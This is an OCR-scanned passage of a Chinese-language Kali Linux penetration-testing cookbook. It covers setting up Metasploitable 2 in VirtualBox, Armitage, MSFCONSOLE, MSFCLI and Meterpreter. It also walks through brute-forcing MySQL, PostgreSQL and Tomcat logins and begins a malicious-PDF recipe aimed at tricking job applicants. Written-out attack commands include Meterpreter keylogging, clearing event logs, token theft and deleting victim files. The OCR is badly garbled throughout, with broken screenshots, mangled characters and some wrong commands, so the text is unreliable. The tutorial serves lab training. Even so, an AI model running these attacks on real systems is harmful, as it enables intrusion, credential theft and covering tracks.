IL dA. E- 4-444 dod he RR beds). 1 Ure Lea tS EM 


4 MB 





9. 选项 现 有 磁盘 ， 并 从 你 下 载 和 保存 Metasploitable 2 文件 夹 的 地 方 选择 VDMK 文件 。 


| | E+ e| 
"m Downloads Date modified Type 
Œ] Recent Places | irbual Nachi bs | 
8/25/2012 6:33 PM —— Virtual Machine Di.. li 
ow) Libraries 
C?) Documents 
gl! Music 


H Videos 


a Computer 
&, Local Disk (C:) 
E DVD/CD-RW Dm | 
cx New Volume (E:) 


File name Metasploitable.wmdk 





10. 你 的 虚拟 磁盘 窗口 会 像 下 面 的 截图 那样 。 在 这 个 示例 中 ， 我 们 完全 不 需要 更 新 磁盘 空 
间 。 这 是 因为 使 用 Metasploitable 的 时 候 ， 你 会 攻击 这 个 系统 ， 而 并 不 是 将 它 用 作 操 作 
f 2 
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Machine 


T Me 


Virtual Hard Disk 


If you wish you can now add a start-up disk to the new machine. You can either create a new virtual disk or select 
one from the lst or from another location using the folder icon. 


If you need a more complex virtual disk setup you can skip this step and make the changes to the machine settings 
once the machine is created, 


The recommended size of the start-un disk is B.00 GB. 
IV. Start-up Disk 
©) Create new hard disk 
@ Use existing hard disk 











11. 点 击 create ° 


Summary 


You are going to create a new virtual machine with the following parameters: 


H— Metasoloitable 2 
OS Type: Ubuntu 
Base Memory: 512 MB 


Start-up Disk: Metasploitable vmdk (Normal, 8.00 GB) 
If the above is correct press the Create button. Once you press it, a new virtual machine will be created. 


Note that you can alter these and all other setting of the created virtual machine at any time using the Settings 
dialog accessible through the menu of the main window. 





12. 通过 点 击 Metasploitable 2 的 名 称 和 start 按钮 来 启动 它 。 


工作 原理 


这 个 秘籍 中 ， 我 们 在 Virtualbox 中 配置 了 Metasploitable 2。 我 们 以 从 sourceforge.net 下 载 
Metasploitable 开始 这 个 秘籍 ， 之 后 我 们 配置 了 VDMK 来 在 VirtualBox 中 运行 并 以 启动 该 系 
统 结 


6.2 学 握 Armitage > Metasploit 的 图 形 管 理工 具 
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新 版 本 的 Metasploit 使 用 叫做 Armitage 的 图 形 化 前 端 工 具 。 Armitage JE& € 2° AA 
它 通过 提供 可 视 化 的 信息 ， 使 你 对 的 使 用 变 nl 。 它 封装 了 Metasploit 控制 

台 ， 并 且 通 过 使 用 它 的 列表 功能 ， 你 可 以 一 次 看 到 比 Metasploit 控制 台 或 Meterpreter 会 话 更 
多 的 内 容 。 


需要 互联 网 或 内 部 网 络 的 连接 。 


RAE JE 


让 我 们 开始 操作 Armitage : 


WR Ei 


l=] start | Kali Linux | Exploitation Tools | Network Exploitation Tools | Armitage ° 










Kali Linux >| op 10 Security Tools > 


alis Office ) 
a Information Gathering » 
f Programming Y 1 i P | 
3 z Vulnerability Analysis * | 


| Un ss Ww Heo Po ioe 
T E r UE T = f E jm 天 = # 


off Web Applications 


System Tools E 2 ， 
Password Attacks » 
(3 Universal Access É &* long. x " 


ld WWireless Attacks 
U ES BeEF X55 Framework » 


^ V Cisco Attacks y 














Expl oitation Tools 























ngis Spa 91 ng 


^u Exploit Database » 
， Metasploit 
Network Exploitation » 





Cb Social Engineering Toolkit 


. BNO 


E 
| 3Wysten A ui boss-aut OP ain wr 
“a 
~ termineter 


2. 在 Armitage 的 登录 界面 中 ， 点 击 connect (连接 ) 按钮 。 


* Connect... 


[127.0.0.1 | 














55553 


mst 
test 


Connect 





3. Armitage 可 能 需要 一 些 时 间 来 连接 Metasploit。 当 它 完 成 时 ， 你 可 能 看 见 下 面 的 提示 窗 
口 。 不 要 惊 懂 ， 一 旦 Armitage 能 够 连接 时 ， 它 会 消失 的 。 在 start Metaspoit? 界面 ， 点 
击 Yes 
Start Metasploit? 
A Metasploit RPC server is not running or 


not accepting connections yet. Would you 
like me to start Metasploit's RPC server 


for you? 





4. 随后 你 会 看 到 Armitage 的 主 窗口 。 我 们 现在 讨论 主 禄 口 的 三 个 区 域 (标记 
Aa» pc? fF MHRA) 。 


o A :这 个 区 域 展 示 了 预先 配置 的 模块 。 你 可 以 通过 模块 列表 下 面 的 搜索 框 来 搜索 。 
o B :这 个 区 域 展 示 了 你 的 活动 目标 ， 我 们 能 够 利用 它 的 漏洞 。 


o c :这 个 区 域 展 示 了 多 个 Metasploit 标签 页 。 它 允许 多 个 Meterpreter 或 控制 台 会 
话 同 时 运行 和 展示 。 





| x ides 
Armitage View Hosts Attacks Workspaces Help 
e [ni auxiliary 
+ B exploit 
* lid payload 
t E post 


A. 





d Console X | 
a 





=[ metasploit vw4.2.6-release [core:4,.2 api:1.0] 
+ == =-=[ 885 exploits - 458 auxiliary - 135 post 
+ -- --2[ 246 payloads = 27 encoders = 8 nops 

=[ svn 114805 updated 177 days ago (2012.02.23) 


Warning: This copy of the Metasploit Framework was Last updated 177 days ago. 
We recommend that you update the framework at least every other day. 
For information on updating your. copy of Metasploit, please see: 
https: //community. rapid7.com/docs /DOC- 1306 


Oo 


启动 Armitage 的 一 个 自动 化 方式 就 是 在 终端 窗口 中 键入 下 列 命令 


armitage 


j IL 


为 了 了 解 更 多 Meterpreter 的 信息 ， 请 见 “ 掌 握 Meterpreter" — Y » 


6.3 掌握 Metasploit 控制 台 (MSFCONSOLE ) 


这 个 秘籍 中 ， 我 们 会 研究 Metasploit 控制 台 (MSFCONSOLE) 。MSFCONSOLE 主 要 用 于 
管理 Metasploit 数据 库 ， 管 理会 话 以 及 配置 和 启动 Metasploit 模块 。 本 质 上 ， 出 于 利用 漏洞 
的 目的 ，MSFCONSOLE 能 够 让 你 连接 到 主机 ， 便 于 你 利用 它 的 漏洞 。 


你 可 以 使 用 以 下 命令 来 和 控制 台 交 互 : 

e help : 这 个 命令 允许 你 查看 你 尝试 运行 的 命令 行 的 帮助 文档 。 

* use module : 命令 允许 你 开始 配置 所 选择 的 模块 。 

© Set optionname module : 这 个 命令 允许 你 为 指定 的 模块 配置 不 同 的 选项 
e exploit : 这 个 命令 尼 动 漏洞 利用 模块 。 

e run : 这 个 命令 局 动 非 漏 洞 利 用 模块 。 


* search module : 命令 允许 你 搜索 独立 模块 。 


。 exit : 这 个 命令 允许 你 退出 MSFCONSOLE * 
准备 
需要 互联 网 或 内 部 网 络 的 连接 。 


操作 步骤 


让 我 们 开始 探索 MSFCONSOLE : 


2， 通 过 下 列 命令 启动 MSFCONSOLE : 


msfconsole 


3， 通 过 search 命令 搜索 所 有 可 用 的 Linux 模块 。 每 次 我 们 打算 执行 操作 时 ， 都 搜索 一 遍 模 
块 通 第 是 个 好 主意 。 主 要 因为 在 Metasploit 的 不 同 版 本 之 间 ， 模 块 路 径 可 能 发 生 改 变 。 


search linux 


nux Commi 
IEP Inline 
"ux/x856/shell reverse tcpz 
eversa TCP Inline - Meatasm Demo 
post/ilinux/gather/checkwvm 
ial Environment Detection 
ost/linux/gather/enum configs 
Configurations 3 
post/Linux.J aa ther/anum network 
' Network Information 
post /Linux/gather/enum protections 
rotection Enumeration 
nst/linux/gather/enum system 
User Information 
x/gather/enum users Hhistóry 
User History : 7 
oost/ Linux, gathar/enum ch at 
- KChat Enumeration 
post/linux/gathaer/hashdump 
- Duap Password Hashes for Linux Systems 
post/Llinux/gather/mount cifs creds 
Saved mount .cifs/maunt . sme Ts C readéentials 
post/linux/gather/pptpd chap secrets 
^ VPN chap-secrets Credentials 
iast /Linux/manage/download exec 
= Download and Exececute 
post /multi/manage;/sudo 


ux / Unix Post Suda Upgrade Shell 


post /windows/manage/pxexploit 





4. 使 用 John the Ripper Linux 密码 破解 模块 。 


use auxiliary/analyzse/jtr linux 


sf > use auxiliary/analyze/jtr_lLinux 


msf auxiliary( 1 > 





5， 通 过 下 列 命令 展示 该 模块 的 可 用 选 
show options 


Ist auxiliaryl | = show options 
Module options (auxiliary/analyza/jtr_Linux): 
[ Name Current Setting 


Crypt false nc Try cryp tt) ormat hashes(Very Slow] 
JOHN BASE na ry ntaining John the Ripper [src, run, doc) 


JOHN PATH 10 The abe Late path to the John the Ripper executable 
Munga false 10 Munge the Wordlist (Slower) 
wordlist 30 The path to an optianal Wordlist 





maf auxiliary| 


6. 既然 我 们 列 出 了 可 以 对 这 个 模块 使 用 的 选项 ， 我 们 可 以 使 用 set 命令 来 设置 独立 选项 。 


让 我 们 设置 JOHN_PATH 选项 : 


set JOHN PATH /usr/share/metasploit-framework/data/john/wordlists/ password.lst 


f. 现在 执行 漏洞 利用 á 我 们 需要 输入 exploit 命令 í 


exploit 


P 


一 旦 你 通过 MSFCONSOLE 获得 了 主机 的 访问 ， 你 需要 使 用 Meterpreter 来 分 发 载荷 。 
MSFCONSOLE 可 以 管理 你 的 回话 ， 而 Meterpreter 执行 实际 的 载荷 分 发 和 漏洞 利用 工作 。 


6.4 掌握 Metasploit CLI (MSFCLI) 


这 个 秘籍 中 ， 我 们 会 探索 Metasploit CLI (MSFCLI) ° Metasploit 需要 接口 来 执行 它 的 任 
务 。MSFCLI 就 是 这 样 的 接口 。 它 是 一 个 极 好 的 接口 ， 用 于 学 习 Metasploit ， 或 测试 /编写 新 
的 漏洞 利用 。 它 也 可 用 于 脚本 的 情况 中 ， 并 且 对 任务 使 用 基本 的 自动 化 。 


使 用 MSFCLI 的 一 个 主要 问题 是 ， 你 只 能 够 一 次 打开 一 个 shell。 你 也 会 注意 到 ， 当 我 们 探索 
一 些 命令 的 时 候 ， 它 比 MSFCONSOLE 慢 并 且 复 杂 。 最 后 ， 你 需要 知道 你 打算 利用 的 具体 漏 
洞 来 使 用 MSFCLI。 这 会 使 它 对 于 渗透 测试 新 手 有 些 难以 使 用 ， 他 们 并 不 熟悉 Metasploit 7& 
洞 利 用 列表 。 


MSFCLI 的 一 些 命令 是 : 


e msfcli : 这 会 加 载 MSFCLI 可 访问 的 所 有 可 用 漏洞 利用 列表 。 


e msfcli -h : 显示 MSFCLI 的 帮助 文档 。 


e msfcli [PATH TO EXPLOIT] [options = value] : 这 是 执行 漏洞 利用 的 语法 
准备 
需要 互联 网 或 内 部 网 络 的 连接 
TETTE JE 


让 我 们 开始 探索 MSFCLI : 


1. ATIRAR CLI (MSFCLI) 。 请 耐心 等 待 ， 因 为 这 可 能 花 一 些 时 间 ， 
取决 于 你 的 系统 速度 。 同 时 注意 当 MSFCLI 加 载 完成 时 ， 会 显示 可 用 的 漏洞 利用 列表 。 


msfcli 


: /usr /binf msfcli 
*] Please wait while we load the module 





2. seas MSFCLI 帮助 文档 : 


msfcli -h 


iT msfcli -h 


‘metasploit/apps/pro/msf3 


now available advanced options for this module 
Show available actions for uis S auxilia ry module 
Run the check routine of the odule 
Execute the selected module 

You're looking at it baby! 

Sh Jw GW "PN able LOS eavasilo 

show available options for 


Show available payloads 
(S)ummary Snow information about this 


argets Show available targets 





3， 出 于 我 们 的 演示 目的 ， 我 们 会 执行 圣诞 树 打 描 ( Christmas Tree Scan) 。 我 们 会 选择 选 
项 A 来 显示 模块 局 级 选项 。 


msfcli auxiliary/scanner/portscan/xmas A 


in the Local network. 


Name : ShowProgress 
Current Setting: true 
Description : Display 5 during a scan 


Name : ShowProgressPercent 
current Setting: 10 
Description : The interval in percent that progress should be shown 


Name : 
Current Setting: 


Description : The 32-bit cookie for UDP probe request 


Current Setting: false 
Description : Enable detailed status messages 


Name : WORKSPACE 
Current eles T 
Description : Specify the workspace for this module 





: /usr/bink | 


4. reap > UA VAD th 4 ay RAR AE ^ AEA s 模式 。 概 览 模 式 是 一 个 极 好 方式 ， 来 查 
看 可 用 于 当前 尝试 执行 的 漏洞 利用 的 所 有 选项 。 许 多 选项 都 是 可 选 的 ， 但 是 一 小 部 分 通 
常 是 必须 的 ， 它 们 允许 你 设置 尝试 利用 哪个 目标 或 端口 的 漏洞 。 


msfcli auxiliary/scanner/portscan/xmas S 


License: Metasploit Framework License (BSD) 
Rank: Normal 


Provided by: 
kris Katteryonn <kKatterj]onn@gmall .com> 


Current Setting Required Description 


— — a 
iD iD O iD 


un 


The number of hosts to scan per set 
The name of the interface 
Ports to scan (e.g. 22-25,80,110-900) 


PO RIS. -10000 fe 
The target address range or CIDR identi 


RHOSTS 
fier 
SNAPLEN 5535 
THREADS 
TIMEOUT 


an 


The number of iig to capture 


P ul 


The number of concurrent threads 
The reply read Cet in milliseconds 


-— 


D 0 0 
H gi ul 


L 


Description: 
Enumerate open|filtered TCP services using a raw "“XMas" scan; this 


sends probes containing the FIN, PSH and URG flags. 





-/usr /bin# 


5. 为 了 展示 可 用 于 此 次 漏洞 利用 的 选项 列表 ， 我 们 使 用 0 模式 。 选 项 使 用 中 配置 漏洞 利用 
模块 的 方式 。 每 个 利用 模块 都 用 不 同 的 选项 集合 (2 hdi ARIZA) Ef ELS S e 
必须 在 漏洞 利用 执行 之 前 设置 。 在 下 面 的 截图 中 ， 你 会 注意 到 许多 所 需 选 项 都 设 为 默 
认 。 如 果 你 碰 到 了 这 种 情况 ， 你 就 不 需要 更 新 选 Mebigeidcid 算 修改 它 


msfcli auxiliary/scanner/portscan/xmas 0 


‘f/usr/bin# msfcli auxiliary/scanner/portscan/xmas 0 
[*] Please walt while we Load the module tree... 


Name Current Setting Required DOSE 


The number of hosts to scan per sel 

The name of the interface 

Ports to scan (e.g. 22-25,80,110-900) 
target address range or CIDR identi 


BATCHS IZE 
INTERFACE 
PORTS 
RHOSTS 

fi ey 
SNAPLEN 
THREADS 
TIMEOUT 


z 


-二 
in tf 6 
Hi 


gi 


e number of bytes to capture 
e number of concurrent threads 
Ihe reply read timeout in milliseconds 


> (D iD 


* d ui ui 


ELT ELT a 


E. 
L 
r 





6. 我 们 使 用 E 模式 来 执行 漏洞 利用 。 


msfcli auxiliary/scanner/portscan/xmas E 


工作 原理 


这 个 秘籍 中 ， 我 们 以 启动 MSFCLI 开始 ， 之 后 搜索 可 用 的 模块 ， 并 执行 该 模块 。 在 搜索 的 过 
程 中 ， 我 们 选修 了 圣诞 树 扫描 模块 并 复查 了 MSFCLI 界面 来 查看 模块 概览 和 所 有 可 用 选项 。 
在 设置 完 所 有 选项 之 后 ， 我 们 执行 了 漏洞 利用 。 
了 解 Metasploit 框架 分 为 三 个 不 同 的 部 分 非常 重要 。 这 些 部 分 是 : 
e HA: 这 些 都 是 弱点 ， 要 和 义 已 知 要 和 义 位 置 。 它 们 包含 在 特定 的 应 用 、 阮 家 宝 或 协议 中 。 
在 Metasploit 中 ， 漏 洞 按 照 分 组 ， 和 漏洞 利用 列 出 ， 漏 洞 利 用 可 以 攻击 列 在 它们 下 面 的 
s je O 
e 漏洞 利用 : 漏洞 利用 是 用 来 利用 所 发 现 漏洞 的 模块 。 
e X: 一 旦 成 功 执行 了 漏洞 利用 ， nidos 给 被 攻击 的 机 器 ， 以 便 允 许 我 们 创建 
shell， 运 行 各 种 命令 ， 添 加 用 户 以 及 其 它 。 


一 旦 你 通过 MSFCONSOLE 获得 了 主机 的 访问 ， 你 需要 使 用 Meterpreter KA X # Fy © 
MSFCONSOLE 可 以 管理 你 的 会 话 ， 而 Meterpreter 执行 实际 的 载荷 分 发 和 漏洞 利用 工作 。 


6.5 学 握 Meterpreter 


一 旦 你 使 用 Armitage > MSFCLI 或 MSFCONSOLE 获得 了 主机 的 访问 权 ， 你 必须 使 用 
Meterpreter 2 1% 3% 1% 8 RET » MSFCONSOLE 可 以 管理 你 的 会 话 ， 而 Meterpreter 执行 实际 
的 载 谷 分 发 和 漏洞 利用 工作 。 


一 些 用 于 Meterpreter 的 第 用 命令 包括 : 
© help : 这 个 命令 允许 你 浏览 帮助 文档 。 


e background : 这 个 命令 允许 你 在 后 台 运 行 Meterpreter 会 话 。 这 个 命令 也 能 为 你 带 回 
MSF 提示 符 。 


e download : 这 个 命令 允许 你 从 受害 者 机 器 中 下 载 文件 。 
© upload : 这 个 命令 允许 你 向 受害 者 机 器 上 传 文件 。 
© execute : 这 个 命令 令 允 许 你 在 受害 者 机 器 上 运行 命令 。 


e shell : 这 个 命令 允许 你 在 受害 者 机 器 上 运行 Windows shell 提示 符 (IRF Windows 
主机 ) 。 


这 个 命令 允许 你 在 会 话 之 间 切 换 。 


@ session -i : 
准备 
需要 满足 下 列 要 求 : 


e 内 部 网 络 或 互联 网 的 连接 。 


e 使 用 Armitage，MSFCLI X MSFCONSOLE 由 Metasploit 创建 好 的 ， 目 标 系统 的 活动 会 
话 。 


TRE Y 3 
让 我 们 打开 MSFCONSOLE 来 开始 : 
1， 首 先 我 们 以 MSFCONSOLE 中 展示 的 活动 会 话 开始 。 


2， 开 始 记 录 目 标 系 统 中 用 户 的 击 键 顺序 : 


keyscan_start 


3. HM E Ae A ALPE PL d BER o HAM-A DRA RE : 


keyscan dump 


4. 停止 记录 目标 系统 中 用 户 的 击 键 顺序 。 
keyscan_stop 


5. 删除 目标 系统 中 的 文件 。 


del exploited.docx 


6. 清除 目标 系统 中 的 事件 日 志 。 
clearav 

T. 展示 和 运行 进程 的 列表 。 
ps 

8. 杀 掉 受害 者 系统 的 指定 进程 ， 使 用 kill [pid] 语法 。 
kill 6353 

9. 党 试 偷 取 目 标 系统 上 的 模拟 令 牌 。 


steal_token 


工作 原理 


我 们 以 通过 Armitage，MSFCLI 或 MSFCONSOLE 预先 建立 的 Meterpreter 会 话 来 开始 。 之 
后 我 们 在 目标 机 器 上 运行 了 多 种 命令 。 


更 多 
当 我 们 对 基于 Linux 主机 使 用 Meterpreter 的 时 候 ， 我 们 能 够 在 它 上 面 运行 Linux 命令 ， 就 像 


我 们 操作 这 人 台 机 器 那样 。 


6.6 Metasploitable MySQL 


这 个 秘籍 中 ， 我 们 会 探索 如 何 使 用 Metasploit 来 攻击 MySQL 数据 库 服务 器 ， 使 用 MySQL 4a 
首 绒 模块 。MySQL 是 许多 网 站 平台 的 选择 ， 包 括 Drupal 和 Wordpress， 许 多 网 站 当前 正在 
使 用 MySQL 数据 库 服务 器 。 这 会 使 它们 更 容 钨 成 为 Metasploitable MySQL 攻击 的 目标 。 


准备 
需要 满足 下 列 要 求 : 
e 内 部 网 络 的 连接 。 
e 运行 在 渗透 环境 中 的 Metasploitable 。 
用 


于 执行 字典 攻击 的 单词 列表 。 


操作 步骤 


让 我 们 通过 打开 终端 窗口 来 开始 MySQL 攻击 : 


2. 尼 动 MSFCONSOLE 。 


msfconsole 


3， 搜 索 可 用 的 MySQL 模块 。 
msfconsole mysql 


= mysql yassl hello 2006 = 
good We . 55L Hello Buffer Overflow 
exploit/pro/web/sqli mysql 2007 


SQL injection 


manda 


exploit/pro/web/sqli_mysql_ php 2000-0 


manual SQL injection e for MySQL 
Ja embedder exec 2013-61-03 00:00:00 UTC 

bitrary File Disclosure 

exploit/windows/mysql/mysql mof 2012-12-01 00:00:00 UTC 


JL for Microsoft Windows MOF Execution 


exe el 1 ent O rac 1 = M " E [ 
2888-81-16 38:88:88 


excellent 

Ll yassl hello 2008-01-04 | 
average MySQL yaSSL SSL Hello Message Buffer Overflow 
exploit/windows/mysql/scrutinizer upload exec 2012-07-27 00:00:00 UTC 


excellent Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Crede 


post/linux/gather/enum contigs 

normal Linux Gather Configurations 
post/linux/gather/enum users history 
normal Linux Gather User History 





4. 4&7] MySQL 扫描 器 模块 。 


use auxiliary/scanner/mysql/mysql login 


‘mysql login 





显示 模块 的 可 用 选项 。 


show options 


msf auxiliary(mysql Login) > show options 


' options (auxillary/scanner/mysql/mysql Login): 


Current Setting 


BLANK PASSWORDS [rue ale Try blank passwords for all users 
BRUTEFORCE SPEED yes How fast to bruteforce, from @ to 5 
PASSWORD 10 A specific password to authenticate with 
PASS FILE FER containing A caesi ene per Line 
RHOSTS JR identifier 
HPORT 
STOP ON SUCCESS 
host 
THREADS yas The number of concurrent threads 
USERNAME i A specific username to authenticate ， 
USERPA so FILE Q File containing users and passwords : 


De 


The tai "met port 


om D 
anon 的 


Stop guessing when a credential works for a 


1 by 1, One pair per Line 
USER AS PASS true 10 Try the username as the passwork 


USER FILE D File containing usernames, one per Line 
VERBOSE true yes Whether to print output for all attempts 


mst auxiliary(mysql login) > 





将 RHOST 设置 为 Metasploitable 2 主机 或 目标 主机 的 地 址 。 


set RHOST 192.168.10.111 


受 置 用 户 名 文件 的 位 置 。 你 可 以 选择 : 


set user_file /root/Desktop/usernames.txt 


设置 密码 文件 的 位 置 。 你 可 以 选择 : 


set pass_file /root/Desktop/passwords.txt 


执行 漏洞 利用 


Exploit 


msf auxiliary(mysql Login) set RHOSTS 192.168.106.111 
IRAUSTS => 197,168.10. 111 


auxiliary(mysql login) : /root/Desktop/usernames.txt 


| file => /root/Desktop/us 
(mysql Login) > set pass file /root/Desktop/Passwords.txt 
/root/Desktop/Passwords. 
y(mysql login) > 





10. Metasploit 会 党 试 输入 包含 在 两 个 文件 中 的 所 有 用 户 名 和 密码 组 合 。 找 到 生效 的 登录 和 密 
码 组 合 旁 边 的 + 符号 就 可 以 了 。 


工作 原理 


这 个 秘籍 中 ， 我 们 使 用 Metasploit 的 MSFCONSOLE 来 利用 Metasploitable 2 3e Ju. E 4&4 
MySQL 漏洞 。 我 们 以 启动 控制 台 并 搜索 所 有 已 知 的 MySQL 模块 来 开始 。 在 选择 MySQL & 
录 利 用 模块 之 后 ， 我 们 设置 了 选项 并 执行 了 漏洞 利用 ， 这 让 我 们 能 够 爆破 MySQL € o 
Metasploit 使 用 提供 的 用 户 名 和 考 码 文件 。 并 尝试 爆破 MySQL 数据 库 。 


P 


这 个 秘籍 中 我 们 使 用 f É 已 生成 的 用 户 名 和 和 密码 文件 o 有 许多 方法 可 以 生成 用 户 名 和 密码 
单词 列表 ， 这 些 方法 在 第 八 章 中 涉及 。 


6.7 Metasploitable PostgreSQL 
这 个 秘籍 中 ， 我 们 会 探索 如 何 使 用 Metasploit 来 攻击 PostgreSQL 数据 库 服务 器 ， 使 用 


PostgreSQL 扫描 器 模块 。PostgreSQL 被 誉 为 全 世界 最 先进 的 开源 数据 库 ， 许 多 爱好 者 声称 
它 是 企业 级 的 数据 库 。 我 们 会 使 用 Metasploit 来 爆破 PostgreSQL 登录 。 


准备 
需要 满足 下 列 要 求 : 


e 内 部 网 络 的 连接 。 


e 运行 在 渗透 环境 中 的 Metasploitable 。 
用 


于 执行 字典 攻击 的 单词 列表 。 


2. Æ 587 MSFCONSOLE 。 


msfconsole 


3. 搜索 可 用 的 PostgreSQL 模块 。 


msfconsole postgresql 


auxiliary/admin/http/rails devise ise 2013-81-28 66:60:60 UTC nor 
Ruby on Rails Devise Authentication Password Reset 
auxiLiary/admin/ post gras postgres. aac dle nor 


PostgreSQL car d d “ar 3 a| L 
BEC TAY MORD; ade at 


Po tgreSQL Server Curae Query 


auxiliaries anner/postgres/postgres dbname flag injection 
PostgreSül Database Name Command Line Flag Injection 
auxiliary,/s 
Postgre 


cannery p gres/postgres “login 
aSOL Login Utility 
auxiliary,/scanner,; 'postgres/postgres version 
PostgreSQL Version Probe 
auxiliary/server/capture/postgresq| 
Authentication Captura: PostgreSQL 
exploit/linux/postgres/postgres poy- oad 2007 -06-05 06:06:66 
ent PostgreSQL for inux Yay bad cut ion 
expLoit/pro/ web; sqli 
SQL injection exploit for PostgreSQL 
exploit/windows/postgres/postgres payload 2009-04-18 00:00:00 UTC 
Lieant PostgreSQL for Microsoft Windows Payload Execution 





4. 4$ PostgreSQL 42 45 2$ 7€ 7X o 
use auxiliary/scanner/mysql/postgres login 


BLANK PASSWORDS true 
Lank passwar ds for all users 
BRUTEFURLE SPEED 35 
from B to 5 
template] 
authenticate against 


oO authenticate with 
fopt/metasplolt/apps/pro/msf3/data/wordlists/postgres default pass.t» 

-ontaining asswords, one per Line * 

RETURN RÜWSET true 
7 true to saa query rasulft sets 

RHOSTS 
arget address range or CIDR identifie 

RPORT aL EN. 
Irget port 

TIOE ON SUCCESS false 

g wnan a greg antial 

THRE! AL | 
mber of concurrent thre 

USERNA Sce to FOE 
UE username to authenticate as 

$3 FI dad ‘met aspLloit/apps/pro/msf3/data/wordlists/postgres default userpass. tx 
users and passwords, one pair par Line 
ER A 3 ponga na 
uU a as the password for all users 
nit/apps/pra/msf3/data/wardlists/pastgres default user.txt no 
containing users, 
WhetF 
nt output 





Lary(postgqres Login) = | 


5. 显示 模 块 的 可 用 选 


show options 


6. 将 RHOST 设置 为 Metasploitable 2 主机 或 目标 主机 的 地 址 。 


set RHOST 192.168.10.111 


T. 设置 用 户 名 文件 的 位 置 。 你 可 以 选择 : 


set user_file /root/Desktop/usernames.txt 


8， 设 置 密 码 文 件 的 位 置 。 你 可 以 选择 : 


set pass_file /root/Desktop/passwords.txt 


9. 执行 漏洞 利用 : 


Exploit 


10. Metasploit 会 党 试 输入 包含 在 两 个 文件 中 的 所 有 用 户 名 和 密码 组 合 。 找 到 生效 的 登录 和 蜜 
LAS ew + 符号 就 可 以 了 。 


工作 原理 


这 个 秘籍 中 ， 我 们 使 用 Metasploit 的 MSFCONSOLE 来 利用 Metasploitable 2 #¢ Ju. E 4% 
PostgreSQL 漏洞 。 我 们 以 启动 控制 台 并 搜索 所 有 已 知 的 PostgreSQL 模块 来 开始 。 在 选择 
PostgreSQL 登录 利用 模块 之 后 ， 我 们 设置 了 选项 并 执行 了 漏洞 利用 ， 这 让 我 们 能 够 爆破 
PostgreSQL 登录 。Metasploit 使 用 提供 的 用 户 名 和 移 码 文件 。 并 尝试 爆破 PostgreSQL 数据 
库 。 之 后 找到 生效 的 登录 和 需 码 组 合 劣 边 的 + 符号 就 可 以 了 。 


更 多 

这 个 秘籍 中 ， 我 们 使 用 了 默认 的 PostgreSQL 用 户 名 和 锋 码 文件 。 然 而 我 们 也 可 以 创建 目 己 
的 文件 。 有 许多 方法 可 以 生成 用 户 名 和 密码 单词 列表 ， 这 些 方法 在 第 八 章 中 涉及 。 

6.8 Metasploitable Tomcat 


这 个 秘籍 中 ， 我 们 会 探索 如 何 使 用 Metasploit 攻击 Tomcat 服务 器 ， 使 用 Tomcat Manager 
Login 模块 。Tomcat， 或 Apache Tomcat » 7+ #289 Web 服务 器 ， 和 Servlet 容器 ， 用 于 运 
^T Java Servt 和 JSP ° Tomcat ARF 25 24$ FR] Java 编写 。 我 们 会 使 用 Metasploit 来 爆破 
Tomcat 的 登录 。 


准备 


需要 满足 下 列 要 求 : 


e 内 部 网 络 的 连接 。 
e 运行 在 渗透 环境 中 的 Metasploitable 。 
用 


于 执行 字典 攻击 的 单词 列表 。 


2. 尼 动 MSFCONSOLE 。 


msfconsole 


3. 搜索 可 用 的 Tomcat 模块 。 


msfconsole tomcat 


Matching Modules 


Nama Disclosure Date Rank Description 


auxiliary/admin/http/tomcat administration normal Tamcat Administ ratior 
Tool Default Access 

auxiliary/admin/http/tomcat utfB traversal normal lomcat UIF-B Directo 
y Traversal Vulnerability g 2 

auxiliary/admin/http/trendmicro dip traversal normal TrendMicro Data 
Prevention 5,5 Directary Traversal 

auxiliary/dos/http/apache tomcat transfer encoding :60 UTC normal Apache Tomcat T 
r-Encoding Information Disclosure and DoS 

auxiliary/dos/http/hashcollision dos 2911-12-28 00:08:89 UTC normal Hashtable Collisions 

auxiliary/scanner/http/tomcat enum normal 
ume ration = 

suxiliar ¥/Stanne! 'hrttp/tomcat m gi ji og lh normal App Lication Me 

r Login Utility 

axploit/multi/http/tomcat mgr deploy 78:66 G excellent Apache Tomcat Manage: 
Application Deployer Authenticated Code Execution 

past /windows/gather/enum tomcat normal Windows Gather Tomcat 
Server Enumeration 


Apache Tomcat User 





4. 使 用 Tomcat Application Manager Login Utility » 


use auxiliary/scanner/http/tomcat mgr login 


5. 显示 模 块 的 可 用 选项 。 


show options 





6. 3X À Pass File 


PASS_FILE meset /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default 
_pass.txt 


T. i Pass File 


USER FILE mset /usr/share/metasploit-framework/data/wordlists/ tomcat mgr default 
pass.txt 


8. 设置 目标 的 RHOST ， 这 里 我 们 选择 我 们 的 Metasploitable 2 主机 : 


set RHOSTS 192.168.10.111 


9. 41% RPORT 设置 为 8180: 


set RPORT 8180 


10. 执行 漏洞 利用 : 


Exploit 


工作 原理 


这 个 秘籍 中 ， 我 们 使 用 Metasploit 的 MSFCONSOLE 来 利用 Metasploitable 2 #¢ Ju. E 4% 
Tomcat 漏洞 。 我 们 以 启动 控制 台 并 搜索 所 有 已 知 的 Tomcat 模块 来 开始 。 在 选择 Tomcat & 
录 利 用 模块 之 后 ， 我 们 设置 了 选项 并 执行 了 漏洞 利用 ， 这 让 我 们 能 够 爆破 Tomcat 登录 。 
Metasploit 使 用 提供 的 用 户 名 和 狗 码 文件 。 并 党 试 爆破 Tomcat 数据 库 。 之 后 找到 生效 的 登录 
fo Ah Pay + 符号 就 可 以 了 。 


6.9 Metasploitable PDF 


这 个 秘籍 中 ， 我 们 会 探索 如 何 使 用 Metasploit 来 执行 攻击 ， 使 用 Adobe PDF A ak 1222 AI A 
PDF 文档 漏洞 。Adobe PDF 是 文档 传输 的 标准 。 由 于 它 的 广泛 使 用 ， 尤 其 是 由 于 它 的 商业 用 
途 ， 我 们 会 通过 让 用 户 认为 他 们 打开 了 来 自 求 职 岗 位 的 正常 PDF 文档 来 攻击 用 户 的 机 器 。 
准备 
需要 满足 下 列 要 求 : 

e 内 部 网 络 的 连接 。 


e 运行 在 渗透 环境 中 的 Metasploitable 。 


e 用 于 执行 字典 攻击 的 单词 列表 。 


操作 步骤 


让 我 们 通过 打开 终端 窗口 来 开始 这 个 秘籍 : 


后 动 MSFCONSOLE ° 


msfconsole 


搜索 可 用 的 PDF 模块 。 


msfconsole pdf 


vice Logging Path Param Buffer 

[wlndowss :factorylink ven gi 

ryLink xg üpcode 9 Buffer Ov 

/windows/scada/iconics genbroker 

H S32 Integer overflow 
exnloit/windows/scada/iconics 

NICS WebHMI 
expLlLolt/winde 
nologies IG: 


exploits 

